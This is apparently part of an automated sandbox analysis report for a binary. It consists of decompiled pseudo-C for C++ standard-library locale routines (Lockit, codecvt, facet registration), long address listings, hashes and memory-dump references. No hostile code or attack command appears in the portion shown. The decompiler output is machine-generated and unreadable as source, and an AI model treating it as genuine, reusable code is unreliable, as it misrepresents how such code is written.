                                                                                                • Instruction ID: 904a37577150d2e0398b8e52cf320e0094f3e7105e0908df7f2564dbe7cfcd66
                                                                                                • Opcode Fuzzy Hash: 53601ce8b458adeaa993223b186a93facb1d5476e021e5d7829299ab14d68ae4
                                                                                                • Instruction Fuzzy Hash: 2111C2359001199BDF04FB64C8256FD77A1AF84720F64400AF405A7392DF38AE02FB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 72%
                                                                                                			E00F820D6(void* __edi, void* __esi, void* __eflags) {
                                                                                                				intOrPtr* _t56;
                                                                                                				void* _t94;
                                                                                                				void* _t95;
                                                                                                				intOrPtr* _t138;
                                                                                                				intOrPtr* _t139;
                                                                                                				intOrPtr* _t154;
                                                                                                				intOrPtr* _t155;
                                                                                                				intOrPtr* _t156;
                                                                                                				intOrPtr* _t158;
                                                                                                				intOrPtr* _t159;
                                                                                                				intOrPtr* _t160;
                                                                                                				intOrPtr* _t161;
                                                                                                				void* _t168;
                                                                                                
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6(_t168 - 0x14, 0);
                                                                                                				_t158 =  *0xfd0950; // 0x0
                                                                                                				 *(_t168 - 4) =  *(_t168 - 4) & 0x00000000;
                                                                                                				 *((intOrPtr*)(_t168 - 0x10)) = _t158;
                                                                                                				_t56 = E00F78A40( *((intOrPtr*)(_t168 + 8)), E00F789D0());
                                                                                                				_t153 = _t56;
                                                                                                				if(_t56 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E(_t168 - 0x14);
                                                                                                					return E00FB388C(_t153);
                                                                                                				} else {
                                                                                                					if(_t158 == 0) {
                                                                                                						_push( *((intOrPtr*)(_t168 + 8)));
                                                                                                						_push(_t168 - 0x10);
                                                                                                						__eflags = E00F8278B(_t153, _t158, __eflags) - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00F78FE0(__eflags);
                                                                                                							asm("int3");
                                                                                                							_push(8);
                                                                                                							E00FB38B2(0xfb6ebe, _t153, _t158);
                                                                                                							E00F856E6(_t168 - 0x14, 0);
                                                                                                							_t159 =  *0xfd0944; // 0x0
                                                                                                							 *(_t168 - 4) =  *(_t168 - 4) & 0x00000000;
                                                                                                							 *((intOrPtr*)(_t168 - 0x10)) = _t159;
                                                                                                							_t154 = E00F78A40( *((intOrPtr*)(_t168 + 8)), E00F789D0());
                                                                                                							__eflags = _t154;
                                                                                                							if(_t154 != 0) {
                                                                                                								L12:
                                                                                                								E00F8573E(_t168 - 0x14);
                                                                                                								return E00FB388C(_t154);
                                                                                                							} else {
                                                                                                								__eflags = _t159;
                                                                                                								if(__eflags == 0) {
                                                                                                									_push( *((intOrPtr*)(_t168 + 8)));
                                                                                                									_push(_t168 - 0x10);
                                                                                                									__eflags = E00F827F3(_t154, _t159, __eflags) - 0xffffffff;
                                                                                                									if(__eflags == 0) {
                                                                                                										E00F78FE0(__eflags);
                                                                                                										asm("int3");
                                                                                                										_push(8);
                                                                                                										E00FB38B2(0xfb6ebe, _t154, _t159);
                                                                                                										E00F856E6(_t168 - 0x14, 0);
                                                                                                										_t160 =  *0xfd0948; // 0x0
                                                                                                										 *(_t168 - 4) =  *(_t168 - 4) & 0x00000000;
                                                                                                										 *((intOrPtr*)(_t168 - 0x10)) = _t160;
                                                                                                										_t155 = E00F78A40( *((intOrPtr*)(_t168 + 8)), E00F789D0());
                                                                                                										__eflags = _t155;
                                                                                                										if(_t155 != 0) {
                                                                                                											L19:
                                                                                                											E00F8573E(_t168 - 0x14);
                                                                                                											return E00FB388C(_t155);
                                                                                                										} else {
                                                                                                											__eflags = _t160;
                                                                                                											if(__eflags == 0) {
                                                                                                												_push( *((intOrPtr*)(_t168 + 8)));
                                                                                                												_push(_t168 - 0x10);
                                                                                                												__eflags = E00F8285B(_t155, _t160, __eflags) - 0xffffffff;
                                                                                                												if(__eflags == 0) {
                                                                                                													E00F78FE0(__eflags);
                                                                                                													asm("int3");
                                                                                                													_push(8);
                                                                                                													E00FB38B2(0xfb6ebe, _t155, _t160);
                                                                                                													E00F856E6(_t168 - 0x14, 0);
                                                                                                													_t161 =  *0xfd094c; // 0x0
                                                                                                													 *(_t168 - 4) =  *(_t168 - 4) & 0x00000000;
                                                                                                													 *((intOrPtr*)(_t168 - 0x10)) = _t161;
                                                                                                													_t156 = E00F78A40( *((intOrPtr*)(_t168 + 8)), E00F789D0());
                                                                                                													__eflags = _t156;
                                                                                                													if(_t156 != 0) {
                                                                                                														L26:
                                                                                                														E00F8573E(_t168 - 0x14);
                                                                                                														return E00FB388C(_t156);
                                                                                                													} else {
                                                                                                														__eflags = _t161;
                                                                                                														if(__eflags == 0) {
                                                                                                															_push( *((intOrPtr*)(_t168 + 8)));
                                                                                                															_push(_t168 - 0x10);
                                                                                                															_t94 = E00F828C3(_t156, _t161, __eflags);
                                                                                                															_pop(_t138);
                                                                                                															__eflags = _t94 - 0xffffffff;
                                                                                                															if(__eflags == 0) {
                                                                                                																_t95 = E00F78FE0(__eflags);
                                                                                                																asm("int3");
                                                                                                																_t139 =  *_t138;
                                                                                                																__eflags = _t139;
                                                                                                																if(_t139 != 0) {
                                                                                                																	_push(_t161);
                                                                                                																	_t162 = _t139;
                                                                                                																	E00F9BD1B( *((intOrPtr*)(_t139 + 8)));
                                                                                                																	E00F9BD1B( *((intOrPtr*)(_t139 + 0x10)));
                                                                                                																	return E00F9BD1B( *((intOrPtr*)(_t162 + 0x14)));
                                                                                                																} else {
                                                                                                																	return _t95;
                                                                                                																}
                                                                                                															} else {
                                                                                                																_t156 =  *((intOrPtr*)(_t168 - 0x10));
                                                                                                																 *((intOrPtr*)(_t168 - 0x10)) = _t156;
                                                                                                																 *(_t168 - 4) = 1;
                                                                                                																E00F85472(_t156);
                                                                                                																 *0xfb81fc();
                                                                                                																 *((intOrPtr*)( *((intOrPtr*)( *_t156 + 4))))();
                                                                                                																 *0xfd094c = _t156;
                                                                                                																goto L26;
                                                                                                															}
                                                                                                														} else {
                                                                                                															_t156 = _t161;
                                                                                                															goto L26;
                                                                                                														}
                                                                                                													}
                                                                                                												} else {
                                                                                                													_t155 =  *((intOrPtr*)(_t168 - 0x10));
                                                                                                													 *((intOrPtr*)(_t168 - 0x10)) = _t155;
                                                                                                													 *(_t168 - 4) = 1;
                                                                                                													E00F85472(_t155);
                                                                                                													 *0xfb81fc();
                                                                                                													 *((intOrPtr*)( *((intOrPtr*)( *_t155 + 4))))();
                                                                                                													 *0xfd0948 = _t155;
                                                                                                													goto L19;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t155 = _t160;
                                                                                                												goto L19;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t154 =  *((intOrPtr*)(_t168 - 0x10));
                                                                                                										 *((intOrPtr*)(_t168 - 0x10)) = _t154;
                                                                                                										 *(_t168 - 4) = 1;
                                                                                                										E00F85472(_t154);
                                                                                                										 *0xfb81fc();
                                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *_t154 + 4))))();
                                                                                                										 *0xfd0944 = _t154;
                                                                                                										goto L12;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t154 = _t159;
                                                                                                									goto L12;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t153 =  *((intOrPtr*)(_t168 - 0x10));
                                                                                                							 *((intOrPtr*)(_t168 - 0x10)) = _t153;
                                                                                                							 *(_t168 - 4) = 1;
                                                                                                							E00F85472(_t153);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t153 + 4))))();
                                                                                                							 *0xfd0950 = _t153;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t153 = _t158;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}
















                                                                                                0x00f820d6
                                                                                                0x00f820dd
                                                                                                0x00f820e7
                                                                                                0x00f820ec
                                                                                                0x00f820f7
                                                                                                0x00f820fb
                                                                                                0x00f82107
                                                                                                0x00f8210c
                                                                                                0x00f82110
                                                                                                0x00f82155
                                                                                                0x00f82158
                                                                                                0x00f82164
                                                                                                0x00f82112
                                                                                                0x00f82114
                                                                                                0x00f8211a
                                                                                                0x00f82120
                                                                                                0x00f82128
                                                                                                0x00f8212b
                                                                                                0x00f82165
                                                                                                0x00f8216a
                                                                                                0x00f8216b
                                                                                                0x00f82172
                                                                                                0x00f8217c
                                                                                                0x00f82181
                                                                                                0x00f8218c
                                                                                                0x00f82190
                                                                                                0x00f821a1
                                                                                                0x00f821a3
                                                                                                0x00f821a5
                                                                                                0x00f821ea
                                                                                                0x00f821ed
                                                                                                0x00f821f9
                                                                                                0x00f821a7
                                                                                                0x00f821a7
                                                                                                0x00f821a9
                                                                                                0x00f821af
                                                                                                0x00f821b5
                                                                                                0x00f821bd
                                                                                                0x00f821c0
                                                                                                0x00f821fa
                                                                                                0x00f821ff
                                                                                                0x00f82200
                                                                                                0x00f82207
                                                                                                0x00f82211
                                                                                                0x00f82216
                                                                                                0x00f82221
                                                                                                0x00f82225
                                                                                                0x00f82236
                                                                                                0x00f82238
                                                                                                0x00f8223a
                                                                                                0x00f8227f
                                                                                                0x00f82282
                                                                                                0x00f8228e
                                                                                                0x00f8223c
                                                                                                0x00f8223c
                                                                                                0x00f8223e
                                                                                                0x00f82244
                                                                                                0x00f8224a
                                                                                                0x00f82252
                                                                                                0x00f82255
                                                                                                0x00f8228f
                                                                                                0x00f82294
                                                                                                0x00f82295
                                                                                                0x00f8229c
                                                                                                0x00f822a6
                                                                                                0x00f822ab
                                                                                                0x00f822b6
                                                                                                0x00f822ba
                                                                                                0x00f822cb
                                                                                                0x00f822cd
                                                                                                0x00f822cf
                                                                                                0x00f82314
                                                                                                0x00f82317
                                                                                                0x00f82323
                                                                                                0x00f822d1
                                                                                                0x00f822d1
                                                                                                0x00f822d3
                                                                                                0x00f822d9
                                                                                                0x00f822df
                                                                                                0x00f822e0
                                                                                                0x00f822e6
                                                                                                0x00f822e7
                                                                                                0x00f822ea
                                                                                                0x00f82324
                                                                                                0x00f82329
                                                                                                0x00f8232a
                                                                                                0x00f8232c
                                                                                                0x00f8232e
                                                                                                0x00f8420b
                                                                                                0x00f8420c
                                                                                                0x00f84211
                                                                                                0x00f84219
                                                                                                0x00f8422a
                                                                                                0x00f82334
                                                                                                0x00f82334
                                                                                                0x00f82334
                                                                                                0x00f822ec
                                                                                                0x00f822ec
                                                                                                0x00f822ef
                                                                                                0x00f822f3
                                                                                                0x00f822f7
                                                                                                0x00f82304
                                                                                                0x00f8230c
                                                                                                0x00f8230e
                                                                                                0x00000000
                                                                                                0x00f8230e
                                                                                                0x00f822d5
                                                                                                0x00f822d5
                                                                                                0x00000000
                                                                                                0x00f822d5
                                                                                                0x00f822d3
                                                                                                0x00f82257
                                                                                                0x00f82257
                                                                                                0x00f8225a
                                                                                                0x00f8225e
                                                                                                0x00f82262
                                                                                                0x00f8226f
                                                                                                0x00f82277
                                                                                                0x00f82279
                                                                                                0x00000000
                                                                                                0x00f82279
                                                                                                0x00f82240
                                                                                                0x00f82240
                                                                                                0x00000000
                                                                                                0x00f82240
                                                                                                0x00f8223e
                                                                                                0x00f821c2
                                                                                                0x00f821c2
                                                                                                0x00f821c5
                                                                                                0x00f821c9
                                                                                                0x00f821cd
                                                                                                0x00f821da
                                                                                                0x00f821e2
                                                                                                0x00f821e4
                                                                                                0x00000000
                                                                                                0x00f821e4
                                                                                                0x00f821ab
                                                                                                0x00f821ab
                                                                                                0x00000000
                                                                                                0x00f821ab
                                                                                                0x00f821a9
                                                                                                0x00f8212d
                                                                                                0x00f8212d
                                                                                                0x00f82130
                                                                                                0x00f82134
                                                                                                0x00f82138
                                                                                                0x00f82145
                                                                                                0x00f8214d
                                                                                                0x00f8214f
                                                                                                0x00000000
                                                                                                0x00f8214f
                                                                                                0x00f82116
                                                                                                0x00f82116
                                                                                                0x00000000
                                                                                                0x00f82116
                                                                                                0x00f82114

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F820DD
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F820E7
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • codecvt.LIBCPMT ref: 00F82121
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F82138
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F82158
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                                                • String ID:
                                                                                                • API String ID: 712880209-0
                                                                                                • Opcode ID: 79e279b5bdc11f983b1bdef07738d5b0613d97cc3e7369284c5bad9c853b5543
                                                                                                • Instruction ID: 8e9b8d4d2c00cbd886ce277e906e5d98bf2605239bf5d9b5ef33107121b9ae2a
                                                                                                • Opcode Fuzzy Hash: 79e279b5bdc11f983b1bdef07738d5b0613d97cc3e7369284c5bad9c853b5543
                                                                                                • Instruction Fuzzy Hash: DF01C4359005199BCB05FB64CC597EE7771AF84760F24410AF505A7392DF38AE02FB82
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
                                                                                                			E00F8709A(void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
                                                                                                				signed int _v4;
                                                                                                				signed int _v16;
                                                                                                				char _v20;
                                                                                                				intOrPtr _v64;
                                                                                                				signed int _t213;
                                                                                                				void* _t394;
                                                                                                				short* _t568;
                                                                                                				void* _t620;
                                                                                                				signed int _t623;
                                                                                                				signed int _t624;
                                                                                                				signed int _t625;
                                                                                                				signed int _t626;
                                                                                                				signed int _t627;
                                                                                                				signed int _t628;
                                                                                                				signed int _t629;
                                                                                                				signed int _t630;
                                                                                                				signed int _t631;
                                                                                                				signed int _t632;
                                                                                                				signed int _t633;
                                                                                                				signed int _t634;
                                                                                                				signed int _t635;
                                                                                                				signed int _t636;
                                                                                                				signed int _t637;
                                                                                                				signed int _t638;
                                                                                                				signed int _t640;
                                                                                                				signed int _t641;
                                                                                                				signed int _t642;
                                                                                                				signed int _t643;
                                                                                                				signed int _t644;
                                                                                                				signed int _t645;
                                                                                                				signed int _t646;
                                                                                                				signed int _t647;
                                                                                                				signed int _t648;
                                                                                                				signed int _t649;
                                                                                                				signed int _t650;
                                                                                                				signed int _t651;
                                                                                                				signed int _t652;
                                                                                                				signed int _t653;
                                                                                                				signed int _t654;
                                                                                                				signed int _t655;
                                                                                                				signed int _t656;
                                                                                                				short* _t657;
                                                                                                
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6( &_v20, 0);
                                                                                                				_t640 =  *0xfd0af0; // 0x0
                                                                                                				_v4 = _v4 & 0x00000000;
                                                                                                				_v16 = _t640;
                                                                                                				_t213 = E00F78A40(_a8, E00F789D0());
                                                                                                				_t622 = _t213;
                                                                                                				if(_t213 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E( &_v20);
                                                                                                					return E00FB388C(_t622);
                                                                                                				} else {
                                                                                                					if(_t640 == 0) {
                                                                                                						_push(_a8);
                                                                                                						_push( &_v16);
                                                                                                						__eflags = E00F8857C(_t622, _t640, __eflags) - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00F78FE0(__eflags);
                                                                                                							asm("int3");
                                                                                                							_push(8);
                                                                                                							E00FB38B2(0xfb6ebe, _t622, _t640);
                                                                                                							E00F856E6( &_v20, 0);
                                                                                                							_t641 =  *0xfd0b04; // 0x0
                                                                                                							_v4 = _v4 & 0x00000000;
                                                                                                							_v16 = _t641;
                                                                                                							_t623 = E00F78A40(_a8, E00F789D0());
                                                                                                							__eflags = _t623;
                                                                                                							if(_t623 != 0) {
                                                                                                								L12:
                                                                                                								E00F8573E( &_v20);
                                                                                                								return E00FB388C(_t623);
                                                                                                							} else {
                                                                                                								__eflags = _t641;
                                                                                                								if(__eflags == 0) {
                                                                                                									_push(_a8);
                                                                                                									_push( &_v16);
                                                                                                									__eflags = E00F885EC(_t623, _t641, __eflags) - 0xffffffff;
                                                                                                									if(__eflags == 0) {
                                                                                                										E00F78FE0(__eflags);
                                                                                                										asm("int3");
                                                                                                										_push(8);
                                                                                                										E00FB38B2(0xfb6ebe, _t623, _t641);
                                                                                                										E00F856E6( &_v20, 0);
                                                                                                										_t642 =  *0xfd0ad4; // 0x0
                                                                                                										_v4 = _v4 & 0x00000000;
                                                                                                										_v16 = _t642;
                                                                                                										_t624 = E00F78A40(_a8, E00F789D0());
                                                                                                										__eflags = _t624;
                                                                                                										if(_t624 != 0) {
                                                                                                											L19:
                                                                                                											E00F8573E( &_v20);
                                                                                                											return E00FB388C(_t624);
                                                                                                										} else {
                                                                                                											__eflags = _t642;
                                                                                                											if(__eflags == 0) {
                                                                                                												_push(_a8);
                                                                                                												_push( &_v16);
                                                                                                												__eflags = E00F88654(_t624, _t642, __eflags) - 0xffffffff;
                                                                                                												if(__eflags == 0) {
                                                                                                													E00F78FE0(__eflags);
                                                                                                													asm("int3");
                                                                                                													_push(8);
                                                                                                													E00FB38B2(0xfb6ebe, _t624, _t642);
                                                                                                													E00F856E6( &_v20, 0);
                                                                                                													_t643 =  *0xfd0b08; // 0x0
                                                                                                													_v4 = _v4 & 0x00000000;
                                                                                                													_v16 = _t643;
                                                                                                													_t625 = E00F78A40(_a8, E00F789D0());
                                                                                                													__eflags = _t625;
                                                                                                													if(_t625 != 0) {
                                                                                                														L26:
                                                                                                														E00F8573E( &_v20);
                                                                                                														return E00FB388C(_t625);
                                                                                                													} else {
                                                                                                														__eflags = _t643;
                                                                                                														if(__eflags == 0) {
                                                                                                															_push(_a8);
                                                                                                															_push( &_v16);
                                                                                                															__eflags = E00F886BC(_t625, _t643, __eflags) - 0xffffffff;
                                                                                                															if(__eflags == 0) {
                                                                                                																E00F78FE0(__eflags);
                                                                                                																asm("int3");
                                                                                                																_push(8);
                                                                                                																E00FB38B2(0xfb6ebe, _t625, _t643);
                                                                                                																E00F856E6( &_v20, 0);
                                                                                                																_t644 =  *0xfd0ad8; // 0x0
                                                                                                																_v4 = _v4 & 0x00000000;
                                                                                                																_v16 = _t644;
                                                                                                																_t626 = E00F78A40(_a8, E00F789D0());
                                                                                                																__eflags = _t626;
                                                                                                																if(_t626 != 0) {
                                                                                                																	L33:
                                                                                                																	E00F8573E( &_v20);
                                                                                                																	return E00FB388C(_t626);
                                                                                                																} else {
                                                                                                																	__eflags = _t644;
                                                                                                																	if(__eflags == 0) {
                                                                                                																		_push(_a8);
                                                                                                																		_push( &_v16);
                                                                                                																		__eflags = E00F88724(_t626, _t644, __eflags) - 0xffffffff;
                                                                                                																		if(__eflags == 0) {
                                                                                                																			E00F78FE0(__eflags);
                                                                                                																			asm("int3");
                                                                                                																			_push(8);
                                                                                                																			E00FB38B2(0xfb6ebe, _t626, _t644);
                                                                                                																			E00F856E6( &_v20, 0);
                                                                                                																			_t645 =  *0xfd0b0c; // 0x0
                                                                                                																			_v4 = _v4 & 0x00000000;
                                                                                                																			_v16 = _t645;
                                                                                                																			_t627 = E00F78A40(_a8, E00F789D0());
                                                                                                																			__eflags = _t627;
                                                                                                																			if(_t627 != 0) {
                                                                                                																				L40:
                                                                                                																				E00F8573E( &_v20);
                                                                                                																				return E00FB388C(_t627);
                                                                                                																			} else {
                                                                                                																				__eflags = _t645;
                                                                                                																				if(__eflags == 0) {
                                                                                                																					_push(_a8);
                                                                                                																					_push( &_v16);
                                                                                                																					__eflags = E00F8878C(_t627, _t645, __eflags) - 0xffffffff;
                                                                                                																					if(__eflags == 0) {
                                                                                                																						E00F78FE0(__eflags);
                                                                                                																						asm("int3");
                                                                                                																						_push(8);
                                                                                                																						E00FB38B2(0xfb6ebe, _t627, _t645);
                                                                                                																						E00F856E6( &_v20, 0);
                                                                                                																						_t646 =  *0xfd0adc; // 0x0
                                                                                                																						_v4 = _v4 & 0x00000000;
                                                                                                																						_v16 = _t646;
                                                                                                																						_t628 = E00F78A40(_a8, E00F789D0());
                                                                                                																						__eflags = _t628;
                                                                                                																						if(_t628 != 0) {
                                                                                                																							L47:
                                                                                                																							E00F8573E( &_v20);
                                                                                                																							return E00FB388C(_t628);
                                                                                                																						} else {
                                                                                                																							__eflags = _t646;
                                                                                                																							if(__eflags == 0) {
                                                                                                																								_push(_a8);
                                                                                                																								_push( &_v16);
                                                                                                																								__eflags = E00F887F4(_t628, _t646, __eflags) - 0xffffffff;
                                                                                                																								if(__eflags == 0) {
                                                                                                																									E00F78FE0(__eflags);
                                                                                                																									asm("int3");
                                                                                                																									_push(8);
                                                                                                																									E00FB38B2(0xfb6ebe, _t628, _t646);
                                                                                                																									E00F856E6( &_v20, 0);
                                                                                                																									_t647 =  *0xfd0b14; // 0x0
                                                                                                																									_v4 = _v4 & 0x00000000;
                                                                                                																									_v16 = _t647;
                                                                                                																									_t629 = E00F78A40(_a8, E00F789D0());
                                                                                                																									__eflags = _t629;
                                                                                                																									if(_t629 != 0) {
                                                                                                																										L54:
                                                                                                																										E00F8573E( &_v20);
                                                                                                																										return E00FB388C(_t629);
                                                                                                																									} else {
                                                                                                																										__eflags = _t647;
                                                                                                																										if(__eflags == 0) {
                                                                                                																											_push(_a8);
                                                                                                																											_push( &_v16);
                                                                                                																											__eflags = E00F8885C(_t629, _t647, __eflags) - 0xffffffff;
                                                                                                																											if(__eflags == 0) {
                                                                                                																												E00F78FE0(__eflags);
                                                                                                																												asm("int3");
                                                                                                																												_push(8);
                                                                                                																												E00FB38B2(0xfb6ebe, _t629, _t647);
                                                                                                																												E00F856E6( &_v20, 0);
                                                                                                																												_t648 =  *0xfd0b10; // 0x0
                                                                                                																												_v4 = _v4 & 0x00000000;
                                                                                                																												_v16 = _t648;
                                                                                                																												_t630 = E00F78A40(_a8, E00F789D0());
                                                                                                																												__eflags = _t630;
                                                                                                																												if(_t630 != 0) {
                                                                                                																													L61:
                                                                                                																													E00F8573E( &_v20);
                                                                                                																													return E00FB388C(_t630);
                                                                                                																												} else {
                                                                                                																													__eflags = _t648;
                                                                                                																													if(__eflags == 0) {
                                                                                                																														_push(_a8);
                                                                                                																														_push( &_v16);
                                                                                                																														__eflags = E00F888E0(_t630, _t648, __eflags) - 0xffffffff;
                                                                                                																														if(__eflags == 0) {
                                                                                                																															E00F78FE0(__eflags);
                                                                                                																															asm("int3");
                                                                                                																															_push(8);
                                                                                                																															E00FB38B2(0xfb6ebe, _t630, _t648);
                                                                                                																															E00F856E6( &_v20, 0);
                                                                                                																															_t649 =  *0xfd0ae4; // 0x0
                                                                                                																															_v4 = _v4 & 0x00000000;
                                                                                                																															_v16 = _t649;
                                                                                                																															_t631 = E00F78A40(_a8, E00F789D0());
                                                                                                																															__eflags = _t631;
                                                                                                																															if(_t631 != 0) {
                                                                                                																																L68:
                                                                                                																																E00F8573E( &_v20);
                                                                                                																																return E00FB388C(_t631);
                                                                                                																															} else {
                                                                                                																																__eflags = _t649;
                                                                                                																																if(__eflags == 0) {
                                                                                                																																	_push(_a8);
                                                                                                																																	_push( &_v16);
                                                                                                																																	__eflags = E00F88965(_t631, _t649, __eflags) - 0xffffffff;
                                                                                                																																	if(__eflags == 0) {
                                                                                                																																		E00F78FE0(__eflags);
                                                                                                																																		asm("int3");
                                                                                                																																		_push(8);
                                                                                                																																		E00FB38B2(0xfb6ebe, _t631, _t649);
                                                                                                																																		E00F856E6( &_v20, 0);
                                                                                                																																		_t650 =  *0xfd0ae0; // 0x0
                                                                                                																																		_v4 = _v4 & 0x00000000;
                                                                                                																																		_v16 = _t650;
                                                                                                																																		_t632 = E00F78A40(_a8, E00F789D0());
                                                                                                																																		__eflags = _t632;
                                                                                                																																		if(_t632 != 0) {
                                                                                                																																			L75:
                                                                                                																																			E00F8573E( &_v20);
                                                                                                																																			return E00FB388C(_t632);
                                                                                                																																		} else {
                                                                                                																																			__eflags = _t650;
                                                                                                																																			if(__eflags == 0) {
                                                                                                																																				_push(_a8);
                                                                                                																																				_push( &_v16);
                                                                                                																																				__eflags = E00F889E9(_t632, _t650, __eflags) - 0xffffffff;
                                                                                                																																				if(__eflags == 0) {
                                                                                                																																					E00F78FE0(__eflags);
                                                                                                																																					asm("int3");
                                                                                                																																					_push(8);
                                                                                                																																					E00FB38B2(0xfb6ebe, _t632, _t650);
                                                                                                																																					E00F856E6( &_v20, 0);
                                                                                                																																					_t651 =  *0xfd0af4; // 0x0
                                                                                                																																					_v4 = _v4 & 0x00000000;
                                                                                                																																					_v16 = _t651;
                                                                                                																																					_t633 = E00F78A40(_a8, E00F789D0());
                                                                                                																																					__eflags = _t633;
                                                                                                																																					if(_t633 != 0) {
                                                                                                																																						L82:
                                                                                                																																						E00F8573E( &_v20);
                                                                                                																																						return E00FB388C(_t633);
                                                                                                																																					} else {
                                                                                                																																						__eflags = _t651;
                                                                                                																																						if(__eflags == 0) {
                                                                                                																																							_push(_a8);
                                                                                                																																							_push( &_v16);
                                                                                                																																							__eflags = E00F88A6E(_t633, _t651, __eflags) - 0xffffffff;
                                                                                                																																							if(__eflags == 0) {
                                                                                                																																								E00F78FE0(__eflags);
                                                                                                																																								asm("int3");
                                                                                                																																								_push(8);
                                                                                                																																								E00FB38B2(0xfb6ebe, _t633, _t651);
                                                                                                																																								E00F856E6( &_v20, 0);
                                                                                                																																								_t652 =  *0xfd0af8; // 0x0
                                                                                                																																								_v4 = _v4 & 0x00000000;
                                                                                                																																								_v16 = _t652;
                                                                                                																																								_t634 = E00F78A40(_a8, E00F789D0());
                                                                                                																																								__eflags = _t634;
                                                                                                																																								if(_t634 != 0) {
                                                                                                																																									L89:
                                                                                                																																									E00F8573E( &_v20);
                                                                                                																																									return E00FB388C(_t634);
                                                                                                																																								} else {
                                                                                                																																									__eflags = _t652;
                                                                                                																																									if(__eflags == 0) {
                                                                                                																																										_push(_a8);
                                                                                                																																										_push( &_v16);
                                                                                                																																										__eflags = E00F88AD6(_t634, _t652, __eflags) - 0xffffffff;
                                                                                                																																										if(__eflags == 0) {
                                                                                                																																											E00F78FE0(__eflags);
                                                                                                																																											asm("int3");
                                                                                                																																											_push(8);
                                                                                                																																											E00FB38B2(0xfb6ebe, _t634, _t652);
                                                                                                																																											E00F856E6( &_v20, 0);
                                                                                                																																											_t653 =  *0xfd0afc; // 0x0
                                                                                                																																											_v4 = _v4 & 0x00000000;
                                                                                                																																											_v16 = _t653;
                                                                                                																																											_t635 = E00F78A40(_a8, E00F789D0());
                                                                                                																																											__eflags = _t635;
                                                                                                																																											if(_t635 != 0) {
                                                                                                																																												L96:
                                                                                                																																												E00F8573E( &_v20);
                                                                                                																																												return E00FB388C(_t635);
                                                                                                																																											} else {
                                                                                                																																												__eflags = _t653;
                                                                                                																																												if(__eflags == 0) {
                                                                                                																																													_push(_a8);
                                                                                                																																													_push( &_v16);
                                                                                                																																													__eflags = E00F88B3E(_t620, _t635, _t653, __eflags) - 0xffffffff;
                                                                                                																																													if(__eflags == 0) {
                                                                                                																																														E00F78FE0(__eflags);
                                                                                                																																														asm("int3");
                                                                                                																																														_push(8);
                                                                                                																																														E00FB38B2(0xfb6ebe, _t635, _t653);
                                                                                                																																														E00F856E6( &_v20, 0);
                                                                                                																																														_t654 =  *0xfd0b18; // 0x0
                                                                                                																																														_v4 = _v4 & 0x00000000;
                                                                                                																																														_v16 = _t654;
                                                                                                																																														_t636 = E00F78A40(_a8, E00F789D0());
                                                                                                																																														__eflags = _t636;
                                                                                                																																														if(_t636 != 0) {
                                                                                                																																															L103:
                                                                                                																																															E00F8573E( &_v20);
                                                                                                																																															return E00FB388C(_t636);
                                                                                                																																														} else {
                                                                                                																																															__eflags = _t654;
                                                                                                																																															if(__eflags == 0) {
                                                                                                																																																_push(_a8);
                                                                                                																																																_push( &_v16);
                                                                                                																																																__eflags = E00F88BB9(_t636, _t654, __eflags) - 0xffffffff;
                                                                                                																																																if(__eflags == 0) {
                                                                                                																																																	E00F78FE0(__eflags);
                                                                                                																																																	asm("int3");
                                                                                                																																																	_push(8);
                                                                                                																																																	E00FB38B2(0xfb6ebe, _t636, _t654);
                                                                                                																																																	E00F856E6( &_v20, 0);
                                                                                                																																																	_t655 =  *0xfd0ae8; // 0x0
                                                                                                																																																	_v4 = _v4 & 0x00000000;
                                                                                                																																																	_v16 = _t655;
                                                                                                																																																	_t637 = E00F78A40(_a8, E00F789D0());
                                                                                                																																																	__eflags = _t637;
                                                                                                																																																	if(_t637 != 0) {
                                                                                                																																																		L110:
                                                                                                																																																		E00F8573E( &_v20);
                                                                                                																																																		return E00FB388C(_t637);
                                                                                                																																																	} else {
                                                                                                																																																		__eflags = _t655;
                                                                                                																																																		if(__eflags == 0) {
                                                                                                																																																			_push(_a8);
                                                                                                																																																			_push( &_v16);
                                                                                                																																																			__eflags = E00F88C25(_t637, _t655, __eflags) - 0xffffffff;
                                                                                                																																																			if(__eflags == 0) {
                                                                                                																																																				E00F78FE0(__eflags);
